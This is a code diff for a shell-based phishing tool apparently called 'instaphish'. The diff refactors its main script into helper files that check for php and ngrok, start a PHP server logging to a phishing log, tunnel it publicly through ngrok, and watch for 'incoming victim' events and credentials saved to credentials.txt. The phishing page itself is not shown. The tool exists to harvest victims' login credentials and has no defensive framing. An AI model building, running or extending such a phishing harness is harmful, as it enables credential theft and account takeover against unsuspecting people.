+13 -70

instaphish.sh

··· 1 1 #!/bin/bash 2 2 3 3 - # Check if php is installed 4 4 - if ! command -v php &>/dev/null; then 5 5 - echo "Please install php first" 6 6 - exit 0 7 7 - fi 3 3 + # Load functions and banner 4 4 + source utils/functions.sh 5 5 + source utils/banner.sh 8 6 9 9 - # Check if ngrok is installed 10 10 - if ! command -v ngrok &>/dev/null; then 11 11 - echo "Please install ngrok first" 12 12 - exit 0 13 13 - fi 14 14 - 15 15 - # Disable Ctrl+C (^C) character display 16 16 - stty -echoctl 17 17 - 18 18 - # Kill on Ctrl+C 19 19 - trap "echo; echo '[*] Shutting down...'; kill $php_pid $ngrok_pid 2>/dev/null; exit 0" INT 7 7 + instaphish_banner 8 8 + check_installation 9 9 + handle_exit 20 10 21 21 - # Function to check if a port is free 22 22 - is_port_free() { 23 23 - ! lsof -i :$1 >/dev/null 2>&1 24 24 - } 11 11 + port=$(get_free_port) 25 12 26 26 - # Generate a random 4-digit free port 27 27 - while true; do 28 28 - port=$((RANDOM % 5999 + 4001)) 13 13 + # Start local PHP server 14 14 + start_php_server "$port" 29 15 30 30 - if is_port_free "$port"; then 31 31 - break 32 32 - fi 33 33 - done 16 16 + # Handle ngrok forwarding 17 17 + start_ngrok_forward 34 18 35 35 - # Start PHP server and log output to file 36 36 - php -S 0.0.0.0:$port >> logs/phishing.log 2>&1 & 37 37 - php_pid=$! 38 38 - echo "[+] Server started on port $port" 39 39 - echo "[+] Local URL : http://localhost:$port" 40 40 - echo 41 41 - 42 42 - # Check if ngrok config exists before forwarding 43 43 - if [[ -f "$HOME/.config/ngrok/ngrok.yml" ]]; then 44 44 - # Start ngrok in background 45 45 - ngrok http $port > /dev/null 2>&1 & 46 46 - ngrok_pid=$! 47 47 - 48 48 - # Wait until ngrok tunnel is available 49 49 - echo -n "[+] Waiting for ngrok tunnel " 50 50 - while true; do 51 51 - ngrok_url=$(curl -s http://127.0.0.1:4040/api/tunnels | grep -o 'https://[^"]*' | head -n 1) 52 52 - if [[ -n "$ngrok_url" ]]; then 53 53 - break 54 54 - fi 55 55 - echo -n "." 56 56 - sleep 0.5 57 57 - done 58 58 - echo "" 59 59 - echo "[+] Port forwarded at $ngrok_url" 60 60 - else 61 61 - echo "[!] Please add your ngrok auth token in order to forward the port" 62 62 - echo "[*] Server is running locally" 63 63 - fi 64 64 - 65 65 - echo 66 66 - echo "[*] Waiting for incoming victim..." 67 67 - 68 68 - # Monitor log file 69 69 - tail -n 0 -f logs/phishing.log | while IFS= read -r line; do 70 70 - if [[ "$line" =~ \[\!\] ]] || [[ "$line" =~ \[\+\] ]] || [[ "$line" =~ \[\*\] ]]; then 71 71 - echo "$line" 72 72 - fi 73 73 - if [[ "$line" == *"[*] Saved in credentials.txt"* ]]; then 74 74 - echo 75 75 - echo "[*] Waiting for incoming victim..." 76 76 - fi 77 77 - done 19 19 + # Wait and handle incoming connections 20 20 + handle_connection

+22

utils/banner.sh

··· 1 1 + #!/bin/bash 2 2 + 3 3 + # Load colors 4 4 + source utils/colors.sh 5 5 + 6 6 + clear 7 7 + 8 8 + function instaphish_banner { 9 9 + local github_link='https://github.com/hatixntsoa' 10 10 + local link_start="\033]8;;${github_link}\033\\" 11 11 + local link_end='\033]8;;\033\\' 12 12 + 13 13 + printf "${BOLD}${MAGENTA}" 14 14 + printf " _ _ _ _ _\n" 15 15 + printf "(_)_ __ ___| |_ __ _ _ __ | |__ (_)___| |__\n" 16 16 + printf "| | '_ \\/ __| __/ _\` | '_ \\| '_ \\| / __| '_ \\ \n" 17 17 + printf "| | | | \\__ \\ || (_| | |_) | | | | \\__ \\ | | |\n" 18 18 + printf "|_|_| |_|___/\\__\\__,_| .__/|_| |_|_|___/_| |_|\n" 19 19 + printf " |_| ${RESET}${BLUE}${link_start}@hatixntsoa${link_end}${RESET}\n\n" 20 20 + 21 21 + printf "${BOLD}${WHITE}[${BLUE}?${WHITE}]${RESET} Press ${WHITE}Ctrl+C${RESET} to stop\n\n" 22 22 + }

+11

utils/colors.sh

··· 1 1 + #!/bin/bash 2 2 + 3 3 + RED="\e[31m" 4 4 + GREEN="\e[32m" 5 5 + BLUE="\e[34m" 6 6 + MAGENTA="\e[35m" 7 7 + CYAN="\e[36m" 8 8 + YELLOW="\e[33m" 9 9 + WHITE="\e[38;2;201;209;217m" 10 10 + BOLD="\e[1m" 11 11 + RESET="\e[0m"

+6

utils/connection.sh

··· 1 1 + #!/bin/bash 2 2 + 3 3 + # function for connection check 4 4 + function connected { 5 5 + ping -c 1 google.com &>/dev/null 6 6 + }

+117

utils/functions.sh

··· 1 1 + #!/bin/bash 2 2 + 3 3 + # Load colors and connection check 4 4 + source utils/colors.sh 5 5 + source utils/connection.sh 6 6 + 7 7 + # Check if php is installed 8 8 + function check_php { 9 9 + if ! command -v php &>/dev/null; then 10 10 + printf "${BOLD}${WHITE}[${RED}x${WHITE}]${RESET} Please install php\n" 11 11 + exit 0 12 12 + fi 13 13 + } 14 14 + 15 15 + # Check if ngrok is installed 16 16 + function check_ngrok { 17 17 + ngrok_installed=$( 18 18 + command -v ngrok &>/dev/null \ 19 19 + && echo true \ 20 20 + || echo false 21 21 + ) 22 22 + } 23 23 + 24 24 + # Check binaries 25 25 + function check_installation { 26 26 + check_php 27 27 + check_ngrok 28 28 + } 29 29 + 30 30 + # Handle exit gracefully 31 31 + function handle_exit { 32 32 + # Disable Ctrl+C (^C) character display 33 33 + stty -echoctl 34 34 + 35 35 + # Trap Ctrl+C (SIGINT) to kill background processes and exit cleanly 36 36 + trap "echo;\ 37 37 + printf '${BOLD}${WHITE}[${RED}*${WHITE}]${RESET} Shutting down\n';\ 38 38 + kill $php_pid $ngrok_pid 2>/dev/null;\ 39 39 + exit 0\ 40 40 + " INT 41 41 + } 42 42 + 43 43 + # Check if a port is free 44 44 + function is_port_free { 45 45 + ! lsof -i :$1 >/dev/null 2>&1 46 46 + } 47 47 + 48 48 + # Generate a random 4-digit free port 49 49 + function get_free_port { 50 50 + while true; do 51 51 + port=$((RANDOM % 5999 + 4001)) 52 52 + if is_port_free "$port"; then 53 53 + echo "$port" 54 54 + return 55 55 + fi 56 56 + done 57 57 + } 58 58 + 59 59 + # Start PHP server and log output to file 60 60 + function start_php_server { 61 61 + php -S 0.0.0.0:$1 >> logs/phishing.log 2>&1 & 62 62 + php_pid=$! 63 63 + printf "${BOLD}${WHITE}[${GREEN}+${WHITE}]${RESET} Server started on port ${YELLOW}$1${RESET}\n" 64 64 + printf "${BOLD}${WHITE}[${BLUE}*${WHITE}]${RESET} Local URL : ${BLUE}http://localhost:$1${RESET}\n\n" 65 65 + } 66 66 + 67 67 + function start_ngrok_forward { 68 68 + if [[ "$ngrok_installed" != "true" ]]; then 69 69 + printf "${BOLD}${WHITE}[${RED}!${WHITE}]${RESET} Ngrok is not installed.\n" 70 70 + printf "${BOLD}${WHITE}[${BLUE}*${WHITE}]${RESET} Server is running locally\n" 71 71 + elif [[ ! -f "$HOME/.config/ngrok/ngrok.yml" ]]; then 72 72 + printf "${BOLD}${WHITE}[${RED}!${WHITE}]${RESET} Ngrok config not found.\n" 73 73 + printf "${BOLD}${WHITE}[${BLUE}*${WHITE}]${RESET} Server is running locally\n" 74 74 + else 75 75 + printf "${BOLD}${WHITE}[${GREEN}?${WHITE}]${RESET} Checking internet connection " 76 76 + if ! connected; then 77 77 + printf "${BOLD}${RED}x${RESET}\n" 78 78 + printf "${BOLD}${WHITE}[${BLUE}*${WHITE}]${RESET} Server is running locally\n" 79 79 + else 80 80 + printf "${BOLD}${GREEN} ${RESET}\n" 81 81 + printf "${BOLD}${WHITE}[${BLUE}*${WHITE}]${RESET} Ngrok tunneling operational\n" 82 82 + start_ngrok 83 83 + fi 84 84 + fi 85 85 + } 86 86 + 87 87 + # Start ngrok and wait for public URL 88 88 + function start_ngrok { 89 89 + ngrok http $port > /dev/null 2>&1 & 90 90 + ngrok_pid=$! 91 91 + 92 92 + printf "\n${BOLD}${WHITE}[${GREEN}+${WHITE}]${RESET} Waiting for ngrok tunnel " 93 93 + while true; do 94 94 + ngrok_url=$(curl -s http://127.0.0.1:4040/api/tunnels | grep -o 'https://[^"]*' | head -n 1) 95 95 + if [[ -n "$ngrok_url" ]]; then 96 96 + break 97 97 + fi 98 98 + echo -n "." 99 99 + sleep 0.5 100 100 + done 101 101 + 102 102 + printf "\n${BOLD}${WHITE}[${BLUE}*${WHITE}]${RESET} Public URL : ${BLUE}$ngrok_url${RESET}\n" 103 103 + } 104 104 + 105 105 + # Monitor log file for connections 106 106 + function handle_connection { 107 107 + printf "\n${BOLD}${WHITE}[${GREEN}*${WHITE}]${RESET} Waiting for incoming victim\n\n" 108 108 + 109 109 + tail -n 0 -f logs/phishing.log | while IFS= read -r line; do 110 110 + if [[ "$line" =~ \[\!\] ]] || [[ "$line" =~ \[\+\] ]] || [[ "$line" =~ \[\*\] ]]; then 111 111 + printf "$line\n" 112 112 + fi 113 113 + if [[ "$line" == *"[*] Saved in credentials.txt"* ]]; then 114 114 + printf "\n${BOLD}${WHITE}[${GREEN}*${WHITE}]${RESET} Waiting for incoming victim\n\n" 115 115 + fi 116 116 + done 117 117 + }